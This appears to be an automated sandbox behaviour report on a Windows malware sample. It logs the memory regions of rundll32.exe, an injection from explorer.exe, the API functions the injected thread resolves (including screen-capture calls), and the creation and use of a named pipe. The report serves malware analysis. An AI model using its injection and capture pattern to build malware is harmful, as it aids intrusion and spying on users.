pagefile_0x0000000000600000 0x00600000 0x00780fff Pagefile Backed Memory Readable True False False -
private_0x0000000000790000 0x00790000 0x007cffff Private Memory Readable, Writable True False False -
private_0x00000000007d0000 0x007d0000 0x0084ffff Private Memory Readable, Writable True False False -
rundll32.exe 0x00910000 0x00921fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000930000 0x00930000 0x0492ffff Pagefile Backed Memory - True False False -
pagefile_0x0000000004930000 0x04930000 0x05d2ffff Pagefile Backed Memory Readable True False False -
private_0x0000000005d30000 0x05d30000 0x05e3dfff Private Memory Readable, Writable True False False -
private_0x0000000005e40000 0x05e40000 0x05f4ffff Private Memory Readable, Writable True False False -
private_0x0000000005e40000 0x05e40000 0x05f3ffff Private Memory Readable, Writable True False False -
private_0x0000000005f40000 0x05f40000 0x05f4ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000005f50000 0x05f50000 0x06441fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000006450000 0x06450000 0x0694afff Private Memory Readable, Writable True False False -
private_0x0000000006950000 0x06950000 0x06e4ffff Private Memory Readable, Writable True False False -
private_0x0000000006e50000 0x06e50000 0x0734efff Private Memory Readable, Writable True False False -
wow64cpu.dll 0x5c9f0000 0x5c9f7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x5ca00000 0x5ca72fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5ca80000 0x5cacefff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x736e0000 0x736fafff Memory Mapped File Readable, Writable, Executable False False False -
sfc_os.dll 0x73dd0000 0x73ddefff Memory Mapped File Readable, Writable, Executable False False False -
winspool.drv 0x73de0000 0x73e46fff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x73e50000 0x73e66fff Memory Mapped File Readable, Writable, Executable False False False -
aclayers.dll 0x73e70000 0x740e7fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74110000 0x74184fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74190000 0x74220fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74230000 0x74288fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74290000 0x74299fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x742a0000 0x742bdfff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x74350000 0x744f4fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74500000 0x7463ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74730000 0x7475afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x74760000 0x75b1efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75b80000 0x75c3dfff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x75c40000 0x75c83fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x75d40000 0x75dbafff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75dc0000 0x75e03fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75f20000 0x76095fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x760a0000 0x760e2fff Memory Mapped File Readable, Writable, Executable False False False -
imagehlp.dll 0x76260000 0x76278fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x76280000 0x7630cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x763b0000 0x76441fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x764d0000 0x769acfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x769b0000 0x76afcfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76bc0000 0x76caffff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76cb0000 0x76ce5fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x76cf0000 0x76ea9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76eb0000 0x76ebbfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x77050000 0x7705efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77070000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77190000 0x77308fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f540000 0x7f540000 0x7f63ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f640000 0x7f640000 0x7f662fff Pagefile Backed Memory Readable True False False -
private_0x000000007f667000 0x7f667000 0x7f669fff Private Memory Readable, Writable True False False -
private_0x000000007f66a000 0x7f66a000 0x7f66afff Private Memory Readable, Writable True False False -
private_0x000000007f66c000 0x7f66c000 0x7f66efff Private Memory Readable, Writable True False False -
private_0x000000007f66f000 0x7f66f000 0x7f66ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb3d30ffff Private Memory Readable True False False -
pagefile_0x00007dfb3d310000 0x7dfb3d310000 0x7ffb3d30ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb3d4d2000 0x7ffb3d4d2000 0x7ffffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #8: c:\windows\syswow64\explorer.exe 0xc78 address = 0x1c0000, size = 162816 True 1
Fn
Data
Modify Control Flow #8: c:\windows\syswow64\explorer.exe 0xc78 os_tid = 0x60c, address = 0x0 True 1
Fn
Threads
Thread 0x60c
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76bd9fe0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x76c00820 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76be6590 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x76c00ba0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76bd2db0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeA, address_out = 0x76bfdde0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76be5f20 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76be64a0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76be6170 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76bd1b90 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76bdfc20 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76bd79b0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76bdf930 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c02560 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76be2230 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76be62a0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x771f2570 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76bd77b0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76be57f0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76be74f0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76bd8840 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76be3a70 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76bd9a40 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76bd9600 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76bd25e0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x771cda90 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76bda3c0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76bd9660 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76bd7940 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771d5e80 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x771d5e00 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76bdfbc0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76bd2da0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c028e0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76bda2c0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76bda790 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76bd9950 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76bdd940 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76bd8c70 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771e9920 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76bd8b70 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x771cbae0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76bda060 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76bda040 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76bd1ba0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76bd9a70 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76bd1da0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76bd9930 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76bd7520 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76bd2af0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76bd7560 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76be4ca0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76be6390 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76bd9730 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsA, address_out = 0x76c00e20 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStrings, address_out = 0x76c01090 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76bda0f0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76bd75a0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76bda3b0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76bd2dc0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76bd1d90 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76bd2b90 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76bd9640 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76be6860 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76be6870 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76bdd8d0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76be6020 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76bd9a80 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76bd9fc0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76bd8770 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76bdfd10 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76bda090 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76be6530 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76be6910 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76be6880 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76be6920 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76bd2d60 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76c026a0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x771e4f40 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76bde240 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76bddb10 True 1 Fn
Module Load module_name = USER32.dll, base_address = 0x74500000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetProcessWindowStation, address_out = 0x745357a0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetThreadDesktop, address_out = 0x74535550 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CloseWindowStation, address_out = 0x74535870 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetProcessWindowStation, address_out = 0x74534f50 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenInputDesktop, address_out = 0x74538be0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CloseDesktop, address_out = 0x74535780 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74534dd0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x745189f0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x74511520 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetThreadDesktop, address_out = 0x74535630 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x745155d0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetLastInputInfo, address_out = 0x7452d000 True 1 Fn
Module Load module_name = GDI32.dll, base_address = 0x769b0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76a30550 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76a30050 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76a2fc80 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x76a31f90 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76a322d0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76a30dc0 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectA, address_out = 0x76a40530 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76a32170 True 1 Fn
System Get Time type = System Time, time = 2018-02-15 18:37:03 (UTC) True 1 Fn
System Get Time type = Ticks, time = 576281 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76bda330 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76bd7580 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76bd9910 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76bdf400 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x771ef190 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x771ea200 True 1 Fn
Environment Get Environment String - True 1 Fn Data
File Open filename = STD_INPUT_HANDLE True 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 1 Fn
File Open filename = STD_ERROR_HANDLE True 1 Fn
Module Get Filename process_name = c:\windows\syswow64\rundll32.exe, file_name_orig = C:\Windows\syswow64\rundll32.exe, size = 260 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76bd9680 True 1 Fn
System Get Time type = Ticks, time = 576281 True 1 Fn
File Create Pipe pipe_name = \device\namedpipe\29a7ba79f8, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1 Fn
System Get Info type = Operating System True 1 Fn
File Write size = 4 True 1 Fn Data
File Write size = 8192 True 13 Fn Data
File Write size = 5584 True 1 Fn Data
System Get Time type = Ticks, time = 577250 True 1 Fn
System Sleep duration = 5000 milliseconds (5.000 seconds) True 1 Fn
System Get Time type = Ticks, time = 582265 True 1 Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1 Fn